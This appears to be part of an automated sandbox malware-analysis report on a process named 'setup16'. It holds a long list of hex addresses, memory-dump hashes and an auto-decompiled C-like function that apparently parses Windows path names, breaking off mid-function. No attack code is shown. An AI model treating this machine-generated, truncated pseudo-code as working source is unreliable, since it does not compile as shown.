                                                                                                                                                                                                        0x04a95d69
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95d6f
                                                                                                                                                                                                        0x04a95d6f
                                                                                                                                                                                                        0x04a95d73
                                                                                                                                                                                                        0x04a95d79
                                                                                                                                                                                                        0x04a95d7f
                                                                                                                                                                                                        0x04a95d86
                                                                                                                                                                                                        0x04a95d95
                                                                                                                                                                                                        0x04a95d98
                                                                                                                                                                                                        0x04a95dba
                                                                                                                                                                                                        0x04a95dcb
                                                                                                                                                                                                        0x04a95dce
                                                                                                                                                                                                        0x04a95dd3
                                                                                                                                                                                                        0x04a95dd6
                                                                                                                                                                                                        0x04a95dd8
                                                                                                                                                                                                        0x04a95de6
                                                                                                                                                                                                        0x04a95dec
                                                                                                                                                                                                        0x04a95dee
                                                                                                                                                                                                        0x04a95df1
                                                                                                                                                                                                        0x04a95df3
                                                                                                                                                                                                        0x04a9635a
                                                                                                                                                                                                        0x04a9635a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a9635a
                                                                                                                                                                                                        0x04a95dfe
                                                                                                                                                                                                        0x04a95e02
                                                                                                                                                                                                        0x04a95e05
                                                                                                                                                                                                        0x04a95e07
                                                                                                                                                                                                        0x04a95e10
                                                                                                                                                                                                        0x04a95e13
                                                                                                                                                                                                        0x04a95e1b
                                                                                                                                                                                                        0x04a95e1c
                                                                                                                                                                                                        0x04a95e21
                                                                                                                                                                                                        0x04a95e22
                                                                                                                                                                                                        0x04a95e23
                                                                                                                                                                                                        0x04a95e25
                                                                                                                                                                                                        0x04a95e2a
                                                                                                                                                                                                        0x04a95e2c
                                                                                                                                                                                                        0x04a95e2e
                                                                                                                                                                                                        0x04a95e36
                                                                                                                                                                                                        0x04a95e39
                                                                                                                                                                                                        0x04a95e42
                                                                                                                                                                                                        0x04a95e47
                                                                                                                                                                                                        0x04a95e4d
                                                                                                                                                                                                        0x04a95e54
                                                                                                                                                                                                        0x04a95e54
                                                                                                                                                                                                        0x04a95e54
                                                                                                                                                                                                        0x04a95e2e
                                                                                                                                                                                                        0x04a95e5c
                                                                                                                                                                                                        0x04a95e5f
                                                                                                                                                                                                        0x04a95e62
                                                                                                                                                                                                        0x04a95e64
                                                                                                                                                                                                        0x04a95e6b
                                                                                                                                                                                                        0x04a95e70
                                                                                                                                                                                                        0x04a95e7a
                                                                                                                                                                                                        0x04a95e7a
                                                                                                                                                                                                        0x04a95e7a
                                                                                                                                                                                                        0x04a95e6b
                                                                                                                                                                                                        0x04a95e7e
                                                                                                                                                                                                        0x04a95e7f
                                                                                                                                                                                                        0x04a95e7f
                                                                                                                                                                                                        0x04a95e81
                                                                                                                                                                                                        0x04a95e87
                                                                                                                                                                                                        0x04a95e8b
                                                                                                                                                                                                        0x04a95e8c
                                                                                                                                                                                                        0x04a95e8c
                                                                                                                                                                                                        0x04a95e8c
                                                                                                                                                                                                        0x04a95e9a
                                                                                                                                                                                                        0x04a95e9c
                                                                                                                                                                                                        0x04a95ea2
                                                                                                                                                                                                        0x04a95ea6
                                                                                                                                                                                                        0x04a95f50
                                                                                                                                                                                                        0x04a95f50
                                                                                                                                                                                                        0x04a95f57
                                                                                                                                                                                                        0x04a95f66
                                                                                                                                                                                                        0x04a95f66
                                                                                                                                                                                                        0x04a95f66
                                                                                                                                                                                                        0x04a95f68
                                                                                                                                                                                                        0x04a95f6a
                                                                                                                                                                                                        0x04a963d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95f70
                                                                                                                                                                                                        0x04a95f70
                                                                                                                                                                                                        0x04a95f91
                                                                                                                                                                                                        0x04a95f9c
                                                                                                                                                                                                        0x04a95f9e
                                                                                                                                                                                                        0x04a95fa4
                                                                                                                                                                                                        0x04a95fa6
                                                                                                                                                                                                        0x04a9638c
                                                                                                                                                                                                        0x04a96392
                                                                                                                                                                                                        0x04a963a1
                                                                                                                                                                                                        0x04a963a7
                                                                                                                                                                                                        0x04a963af
                                                                                                                                                                                                        0x04a963af
                                                                                                                                                                                                        0x04a963bd
                                                                                                                                                                                                        0x04a963d8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a963d8
                                                                                                                                                                                                        0x04a95fac
                                                                                                                                                                                                        0x04a95fb2
                                                                                                                                                                                                        0x04a95fb4
                                                                                                                                                                                                        0x04a95fbd
                                                                                                                                                                                                        0x04a95fc6
                                                                                                                                                                                                        0x04a95fce
                                                                                                                                                                                                        0x04a95fd4
                                                                                                                                                                                                        0x04a95fdc
                                                                                                                                                                                                        0x04a95fec
                                                                                                                                                                                                        0x04a95fed
                                                                                                                                                                                                        0x04a95fee
                                                                                                                                                                                                        0x04a95fef
                                                                                                                                                                                                        0x04a95ff9
                                                                                                                                                                                                        0x04a95ffa
                                                                                                                                                                                                        0x04a95ffb
                                                                                                                                                                                                        0x04a95ffc
                                                                                                                                                                                                        0x04a96000
                                                                                                                                                                                                        0x04a96004
                                                                                                                                                                                                        0x04a96012
                                                                                                                                                                                                        0x04a96012
                                                                                                                                                                                                        0x04a96018
                                                                                                                                                                                                        0x04a96019
                                                                                                                                                                                                        0x04a9601a
                                                                                                                                                                                                        0x04a9601b
                                                                                                                                                                                                        0x04a9601c
                                                                                                                                                                                                        0x04a96020
                                                                                                                                                                                                        0x04a96059
                                                                                                                                                                                                        0x04a9605c
                                                                                                                                                                                                        0x04a96061
                                                                                                                                                                                                        0x04a96061
                                                                                                                                                                                                        0x04a96022
                                                                                                                                                                                                        0x04a96022
                                                                                                                                                                                                        0x04a96022
                                                                                                                                                                                                        0x04a96025
                                                                                                                                                                                                        0x04a9602a
                                                                                                                                                                                                        0x04a9602b
                                                                                                                                                                                                        0x04a96031
                                                                                                                                                                                                        0x04a96037
                                                                                                                                                                                                        0x04a96038
                                                                                                                                                                                                        0x04a9603e
                                                                                                                                                                                                        0x04a96048
                                                                                                                                                                                                        0x04a96049
                                                                                                                                                                                                        0x04a9604a
                                                                                                                                                                                                        0x04a9604b
                                                                                                                                                                                                        0x04a9604c
                                                                                                                                                                                                        0x04a9604d
                                                                                                                                                                                                        0x04a96053
                                                                                                                                                                                                        0x04a96054
                                                                                                                                                                                                        0x04a96054
                                                                                                                                                                                                        0x04a96062
                                                                                                                                                                                                        0x04a96065
                                                                                                                                                                                                        0x04a96067
                                                                                                                                                                                                        0x04a9606a
                                                                                                                                                                                                        0x04a96070
                                                                                                                                                                                                        0x04a96075
                                                                                                                                                                                                        0x04a96076
                                                                                                                                                                                                        0x04a96081
                                                                                                                                                                                                        0x04a96087
                                                                                                                                                                                                        0x04a96095
                                                                                                                                                                                                        0x04a96099
                                                                                                                                                                                                        0x04a9609e
                                                                                                                                                                                                        0x04a960a4
                                                                                                                                                                                                        0x04a960ae
                                                                                                                                                                                                        0x04a960b0
                                                                                                                                                                                                        0x04a960b3
                                                                                                                                                                                                        0x04a960b6
                                                                                                                                                                                                        0x04a960b8
                                                                                                                                                                                                        0x04a960ba
                                                                                                                                                                                                        0x04a960ba
                                                                                                                                                                                                        0x04a960ba
                                                                                                                                                                                                        0x04a960ba
                                                                                                                                                                                                        0x04a960be
                                                                                                                                                                                                        0x04a960c0
                                                                                                                                                                                                        0x04a960c5
                                                                                                                                                                                                        0x04a960c5
                                                                                                                                                                                                        0x04a960c5
                                                                                                                                                                                                        0x04a960c6
                                                                                                                                                                                                        0x04a960cd
                                                                                                                                                                                                        0x04a96114
                                                                                                                                                                                                        0x04a960cf
                                                                                                                                                                                                        0x04a960cf
                                                                                                                                                                                                        0x04a960d4
                                                                                                                                                                                                        0x04a960d5
                                                                                                                                                                                                        0x04a960da
                                                                                                                                                                                                        0x04a960db
                                                                                                                                                                                                        0x04a960e1
                                                                                                                                                                                                        0x04a960e2
                                                                                                                                                                                                        0x04a960e8
                                                                                                                                                                                                        0x04a960f8
                                                                                                                                                                                                        0x04a960fd
                                                                                                                                                                                                        0x04a960fe
                                                                                                                                                                                                        0x04a96102
                                                                                                                                                                                                        0x04a96104
                                                                                                                                                                                                        0x04a96107
                                                                                                                                                                                                        0x04a96109
                                                                                                                                                                                                        0x04a9610b
                                                                                                                                                                                                        0x04a9610b
                                                                                                                                                                                                        0x04a9610b
                                                                                                                                                                                                        0x04a9610b
                                                                                                                                                                                                        0x04a9610f
                                                                                                                                                                                                        0x04a9610f
                                                                                                                                                                                                        0x04a96117
                                                                                                                                                                                                        0x04a9611a
                                                                                                                                                                                                        0x04a9611f
                                                                                                                                                                                                        0x04a96125
                                                                                                                                                                                                        0x04a96134
                                                                                                                                                                                                        0x04a96139
                                                                                                                                                                                                        0x04a9613f
                                                                                                                                                                                                        0x04a96146
                                                                                                                                                                                                        0x04a96148
                                                                                                                                                                                                        0x04a9614b
                                                                                                                                                                                                        0x04a9614d
                                                                                                                                                                                                        0x04a9614f
                                                                                                                                                                                                        0x04a9614f
                                                                                                                                                                                                        0x04a9614f
                                                                                                                                                                                                        0x04a9614f
                                                                                                                                                                                                        0x04a96153
                                                                                                                                                                                                        0x04a96159
                                                                                                                                                                                                        0x04a96159
                                                                                                                                                                                                        0x04a9615c
                                                                                                                                                                                                        0x04a96163
                                                                                                                                                                                                        0x04a96169
                                                                                                                                                                                                        0x04a9616c
                                                                                                                                                                                                        0x04a96172
                                                                                                                                                                                                        0x04a96181
                                                                                                                                                                                                        0x04a96186
                                                                                                                                                                                                        0x04a96187
                                                                                                                                                                                                        0x04a9618b
                                                                                                                                                                                                        0x04a96191
                                                                                                                                                                                                        0x04a96195
                                                                                                                                                                                                        0x04a961a3
                                                                                                                                                                                                        0x04a961bb
                                                                                                                                                                                                        0x04a961c0
                                                                                                                                                                                                        0x04a961c3
                                                                                                                                                                                                        0x04a961cc
                                                                                                                                                                                                        0x04a961d0
                                                                                                                                                                                                        0x04a961dc
                                                                                                                                                                                                        0x04a961de
                                                                                                                                                                                                        0x04a961e1
                                                                                                                                                                                                        0x04a961e4
                                                                                                                                                                                                        0x04a961e6
                                                                                                                                                                                                        0x04a961e8
                                                                                                                                                                                                        0x04a961e8
                                                                                                                                                                                                        0x04a961e8
                                                                                                                                                                                                        0x04a961e8
                                                                                                                                                                                                        0x04a961e6
                                                                                                                                                                                                        0x04a961ec
                                                                                                                                                                                                        0x04a961f3
                                                                                                                                                                                                        0x04a96203
                                                                                                                                                                                                        0x04a96209
                                                                                                                                                                                                        0x04a9620a
                                                                                                                                                                                                        0x04a96216
                                                                                                                                                                                                        0x04a9621d
                                                                                                                                                                                                        0x04a96227
                                                                                                                                                                                                        0x04a96241
                                                                                                                                                                                                        0x04a96246
                                                                                                                                                                                                        0x04a9624c
                                                                                                                                                                                                        0x04a96257
                                                                                                                                                                                                        0x04a96259
                                                                                                                                                                                                        0x04a9625c
                                                                                                                                                                                                        0x04a9625e
                                                                                                                                                                                                        0x04a96260
                                                                                                                                                                                                        0x04a96260
                                                                                                                                                                                                        0x04a96260
                                                                                                                                                                                                        0x04a96260
                                                                                                                                                                                                        0x04a9625e
                                                                                                                                                                                                        0x04a96264
                                                                                                                                                                                                        0x04a96267
                                                                                                                                                                                                        0x04a96269
                                                                                                                                                                                                        0x04a96315
                                                                                                                                                                                                        0x04a96315
                                                                                                                                                                                                        0x04a9631b
                                                                                                                                                                                                        0x04a9631e
                                                                                                                                                                                                        0x04a96324
                                                                                                                                                                                                        0x04a96327
                                                                                                                                                                                                        0x04a9632f
                                                                                                                                                                                                        0x04a96330
                                                                                                                                                                                                        0x04a96333
                                                                                                                                                                                                        0x04a9633a
                                                                                                                                                                                                        0x04a9633c
                                                                                                                                                                                                        0x04a96335
                                                                                                                                                                                                        0x04a96335
                                                                                                                                                                                                        0x04a96335
                                                                                                                                                                                                        0x04a9633f
                                                                                                                                                                                                        0x04a96342
                                                                                                                                                                                                        0x04a9634c
                                                                                                                                                                                                        0x04a96352
                                                                                                                                                                                                        0x04a96355
                                                                                                                                                                                                        0x04a96355
                                                                                                                                                                                                        0x04a96359
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a9626f
                                                                                                                                                                                                        0x04a96275
                                                                                                                                                                                                        0x04a96275
                                                                                                                                                                                                        0x04a96278
                                                                                                                                                                                                        0x04a9627e
                                                                                                                                                                                                        0x04a9627e
                                                                                                                                                                                                        0x04a96281
                                                                                                                                                                                                        0x04a96287
                                                                                                                                                                                                        0x04a9628d
                                                                                                                                                                                                        0x04a96298
                                                                                                                                                                                                        0x04a9629c
                                                                                                                                                                                                        0x04a962a2
                                                                                                                                                                                                        0x04a9629e
                                                                                                                                                                                                        0x04a9629e
                                                                                                                                                                                                        0x04a9629e
                                                                                                                                                                                                        0x04a962a7
                                                                                                                                                                                                        0x04a962a7
                                                                                                                                                                                                        0x04a962aa
                                                                                                                                                                                                        0x04a962b0
                                                                                                                                                                                                        0x04a962f0
                                                                                                                                                                                                        0x04a962f0
                                                                                                                                                                                                        0x04a962f2
                                                                                                                                                                                                        0x04a962f8
                                                                                                                                                                                                        0x04a962fd
                                                                                                                                                                                                        0x04a962b2
                                                                                                                                                                                                        0x04a962b2
                                                                                                                                                                                                        0x04a962b2
                                                                                                                                                                                                        0x04a962b5
                                                                                                                                                                                                        0x04a962dd
                                                                                                                                                                                                        0x04a962e2
                                                                                                                                                                                                        0x04a962e5
                                                                                                                                                                                                        0x04a962b7
                                                                                                                                                                                                        0x04a962b8
                                                                                                                                                                                                        0x04a962bb
                                                                                                                                                                                                        0x04a962bd
                                                                                                                                                                                                        0x04a962c0
                                                                                                                                                                                                        0x04a962c4
                                                                                                                                                                                                        0x04a962cd
                                                                                                                                                                                                        0x04a962cd
                                                                                                                                                                                                        0x04a962c0
                                                                                                                                                                                                        0x04a962bb
                                                                                                                                                                                                        0x04a962b5
                                                                                                                                                                                                        0x04a96302
                                                                                                                                                                                                        0x04a96303
                                                                                                                                                                                                        0x04a96305
                                                                                                                                                                                                        0x04a96305
                                                                                                                                                                                                        0x04a96305
                                                                                                                                                                                                        0x04a9630c
                                                                                                                                                                                                        0x04a9630c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a9627e
                                                                                                                                                                                                        0x04a96269
                                                                                                                                                                                                        0x04a95eac
                                                                                                                                                                                                        0x04a95ebb
                                                                                                                                                                                                        0x04a95ebe
                                                                                                                                                                                                        0x04a95ecb
                                                                                                                                                                                                        0x04a95ecb
                                                                                                                                                                                                        0x04a95ece
                                                                                                                                                                                                        0x04a95ece
                                                                                                                                                                                                        0x04a95ed4
                                                                                                                                                                                                        0x04a95ed7
                                                                                                                                                                                                        0x04a95ed9
                                                                                                                                                                                                        0x04a95edb
                                                                                                                                                                                                        0x04a95edb
                                                                                                                                                                                                        0x04a95ee1
                                                                                                                                                                                                        0x04a95ee1
                                                                                                                                                                                                        0x04a95ee3
                                                                                                                                                                                                        0x04a95f20
                                                                                                                                                                                                        0x04a95f20
                                                                                                                                                                                                        0x04a95ee5
                                                                                                                                                                                                        0x04a95ee5
                                                                                                                                                                                                        0x04a95ee5
                                                                                                                                                                                                        0x04a95ee8
                                                                                                                                                                                                        0x04a95f11
                                                                                                                                                                                                        0x04a95f18
                                                                                                                                                                                                        0x04a95eea
                                                                                                                                                                                                        0x04a95eea
                                                                                                                                                                                                        0x04a95eed
                                                                                                                                                                                                        0x04a95ef2
                                                                                                                                                                                                        0x04a95ef8
                                                                                                                                                                                                        0x04a95efb
                                                                                                                                                                                                        0x04a95f0a
                                                                                                                                                                                                        0x04a95f0a
                                                                                                                                                                                                        0x04a95eed
                                                                                                                                                                                                        0x04a95ee8
                                                                                                                                                                                                        0x04a95f22
                                                                                                                                                                                                        0x04a95f28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95f30
                                                                                                                                                                                                        0x04a95f31
                                                                                                                                                                                                        0x04a95f37
                                                                                                                                                                                                        0x04a95f3a
                                                                                                                                                                                                        0x04a95f3d
                                                                                                                                                                                                        0x04a95f44
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95f46
                                                                                                                                                                                                        0x04a95f48
                                                                                                                                                                                                        0x04a95f4d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95f4d
                                                                                                                                                                                                        0x04a95dda
                                                                                                                                                                                                        0x04a95ddf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95ddf
                                                                                                                                                                                                        0x04a95dd8
                                                                                                                                                                                                        0x04a95da7
                                                                                                                                                                                                        0x04a95da9
                                                                                                                                                                                                        0x04a95dac
                                                                                                                                                                                                        0x04a95dae
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95db4
                                                                                                                                                                                                        0x04a95db4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95db4
                                                                                                                                                                                                        0x04a95dae
                                                                                                                                                                                                        0x04a95d88
                                                                                                                                                                                                        0x04a95d8d
                                                                                                                                                                                                        0x04a96363
                                                                                                                                                                                                        0x04a96369
                                                                                                                                                                                                        0x04a9636a
                                                                                                                                                                                                        0x04a96370
                                                                                                                                                                                                        0x04a96372
                                                                                                                                                                                                        0x04a9637a
                                                                                                                                                                                                        0x04a9637b
                                                                                                                                                                                                        0x04a9637d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a9637f
                                                                                                                                                                                                        0x04a96385
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a96385
                                                                                                                                                                                                        0x04a95d38
                                                                                                                                                                                                        0x04a95d3b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a95d3b
                                                                                                                                                                                                        0x04a95d27
                                                                                                                                                                                                        0x04a95d29
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a96360
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a96360
                                                                                                                                                                                                        0x04a95c10
                                                                                                                                                                                                        0x04a95c10
                                                                                                                                                                                                        0x04a963da
                                                                                                                                                                                                        0x04a963e5
                                                                                                                                                                                                        0x04a963e5

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b3b642c79940f8e4f9a9323d9379fb2e76e6fa5a48205ca89f911d17fcd7a457
                                                                                                                                                                                                        • Instruction ID: 5a2196d8bd1d42524355b213d24b5b0f7fd1ec150d989fcef461ff1ab5898d54
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3b642c79940f8e4f9a9323d9379fb2e76e6fa5a48205ca89f911d17fcd7a457
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4423975E002299FDB25CF68C981BAAB7F1FF45304F1481AAD84DAB242E774AD85CF50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049E4120 Relevance: .4, Instructions: 444COMMONCrypto
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E049E4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4abd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E049FF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E049E6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L049E4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E049E6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M049E45F8))) {
												case 0:
													_v568 = 0x49a1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x49a11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L049E4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04A0F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04A0F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E049C52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E049DEB70(1, 0x4ab79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E049DAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04A095D0();
																			L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
